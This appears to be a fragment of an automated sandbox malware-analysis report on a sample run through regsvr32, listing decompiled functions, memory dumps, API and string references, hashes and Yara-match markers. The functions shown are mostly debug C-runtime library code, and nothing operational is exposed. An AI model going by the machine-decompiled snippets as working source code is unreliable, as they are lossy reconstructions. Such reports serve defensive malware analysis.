                                                      			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {

				_a48 = __rax;
				if (_a48 == 0) goto 0xf9d243ad;
				goto 0xf9d243f5;
				if (_a88 != 0) goto 0xf9d243ce;
				if (_a120 == 0) goto 0xf9d243c7;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
				if (_a120 == 0) goto 0xf9d243ef;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				goto 0xf9d24377;
				return 0;
			}



                                                      0x7fef9d24399
                                                      0x7fef9d243a4
                                                      0x7fef9d243ab
                                                      0x7fef9d243b2
                                                      0x7fef9d243ba
                                                      0x7fef9d243c1
                                                      0x7fef9d243cc
                                                      0x7fef9d243da
                                                      0x7fef9d243e2
                                                      0x7fef9d243e9
                                                      0x7fef9d243f1
                                                      0x7fef9d243f3
                                                      0x7fef9d243f9

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                                      • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D23471 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _ioterm
                                                      • String ID:
                                                      • API String ID: 4163092671-0
                                                      • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                      • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                                      • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                                      • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D23433 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                                        • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                                        • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                                        • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                                        • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                      • String ID:
                                                      • API String ID: 1508997487-0
                                                      • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                                      • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                                      • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D288D0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DestroyHeap
                                                      • String ID:
                                                      • API String ID: 2435110975-0
                                                      • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                      • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                                      • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                      • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D23D00 Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID:
                                                      • API String ID: 2118026453-0
                                                      • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                      • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                                      • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                      • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 000007FEF9D30215 Relevance: 89.7, APIs: 29, Strings: 22, Instructions: 441COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                      • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                      • API String ID: 4197005980-4190456261
                                                      • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                      • Instruction ID: 631fc2af3d1e2e358681470289229c30ebeab24735d73449bcceef6109dc099e
                                                      • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                      • Instruction Fuzzy Hash: 6B421031A0CA8685EBB0CB14E8547EE73E4F784345FA04226D6CD43AA9DF7EE549CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D30CC0 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 140libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                      • API String ID: 2256938910-232180764
                                                      • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                      • Instruction ID: c20bf9db26653c31616cb8f8a39641649b62d884e8934e9a70f617ae2971618d
                                                      • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                      • Instruction Fuzzy Hash: 9A81C631A19B8686E7A09B19FC4436EB3E0F784755F608135DACE426B8DF7EE448CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D24A70 Relevance: 30.3, APIs: 2, Strings: 15, Instructions: 504COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                      • API String ID: 0-1181733849
                                                      • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                      • Instruction ID: c027552587c484905274aa3c7dfc2130a2bba284c4db387798f357193d3a2f5b
                                                      • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                      • Instruction Fuzzy Hash: B3421035A0DB8685EBA08B69E88076E77E0F785794F214136DADD83BB4DB7ED440CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D253FB Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 267memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                                      • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                                      • Client hook free failure., xrefs: 000007FEF9D254A0
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                                      • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                                      • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: HeapPointerValid_free_base
                                                      • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                      • API String ID: 1656799702-182684663
                                                      • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                      • Instruction ID: 30c4da0a101ad128366c20b2541b857d1a248eb6f856515bedc9f5e1dcd2840f
                                                      • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                      • Instruction Fuzzy Hash: 58C16E36A18B4586EBA48B59E88076EB7E0F785790F614536EACD43BB4DB7ED401CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D25CAD Relevance: 17.8, Strings: 14, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                                      • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                                      • _1, xrefs: 000007FEF9D261FC
                                                      • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                      • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                                      • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                      • DAMAGED, xrefs: 000007FEF9D25E7D
                                                      • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                                      • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                      • API String ID: 0-510578482
                                                      • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                      • Instruction ID: 2e3929c610d79aeb9f6375ea398ef70322b77c1420209f8d6f9956d4446a531d
                                                      • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                      • Instruction Fuzzy Hash: A6E13F36A18B5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000FFC0 Relevance: 15.0, Strings: 11, Instructions: 1219COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: E$#r5|$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                      • API String ID: 0-2241473280
                                                      • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                      • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                      • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                      • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D23280 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 57%
                                                      			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
				void* _t7;
				void* _t10;
				signed long long _t15;
				signed long long* _t16;
				signed long long _t20;
				signed long long _t24;

				_t7 = __rcx -  *0xf9d4b018; // 0x6ec2365e8408
				if (_t7 != 0) goto 0xf9d2329a;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
				asm("repe ret");
				asm("dec eax");
				goto 0xf9d23720;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("o16 nop [eax+eax]");
				if (__r8 - 8 < 0) goto 0xf9d2330c;
				_t20 = __rdx * 0x1010101;
				_t10 = __r8 - 0x40;
				if (_t10 < 0) goto 0xf9d232ee;
				_t15 =  ~__rcx;
				if (_t10 == 0) goto 0xf9d232de;
				 *__rcx = _t20;
				_t16 = _t15 + __rcx;
				if (_t10 != 0) goto 0xf9d23327;
				_t24 = __r8 - _t15 & 7;
				if (_t10 == 0) goto 0xf9d2330c;
				 *_t16 = _t20;
				if (_t10 != 0) goto 0xf9d23300;
				if (_t24 == 0) goto 0xf9d2331b;
				_t16[1] = __edx & 0x000000ff;
				if (_t24 - 1 != 0) goto 0xf9d23311;
				return __eax;
			}









                                                      0x7fef9d23280
                                                      0x7fef9d23287
                                                      0x7fef9d23289
                                                      0x7fef9d23292
                                                      0x7fef9d23294
                                                      0x7fef9d23296
                                                      0x7fef9d2329a
                                                      0x7fef9d2329f
                                                      0x7fef9d232a0
                                                      0x7fef9d232a1
                                                      0x7fef9d232a2
                                                      0x7fef9d232a3
                                                      0x7fef9d232a4
                                                      0x7fef9d232a5
                                                      0x7fef9d232a6
                                                      0x7fef9d232b7
                                                      0x7fef9d232c6
                                                      0x7fef9d232ca
                                                      0x7fef9d232ce
                                                      0x7fef9d232d0
                                                      0x7fef9d232d6
                                                      0x7fef9d232db
                                                      0x7fef9d232de
                                                      0x7fef9d232ec
                                                      0x7fef9d232f1
                                                      0x7fef9d232f9
                                                      0x7fef9d23300
                                                      0x7fef9d2330a
                                                      0x7fef9d2330f
                                                      0x7fef9d23311
                                                      0x7fef9d23319
                                                      0x7fef9d2331b

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3778485334-0
                                                      • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                      • Instruction ID: 807cfb07a33e429e3d371e20a7d7f9b872ed56a9d2d7ce20ec260cf370a1508c
                                                      • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                      • Instruction Fuzzy Hash: 9B31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2443C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
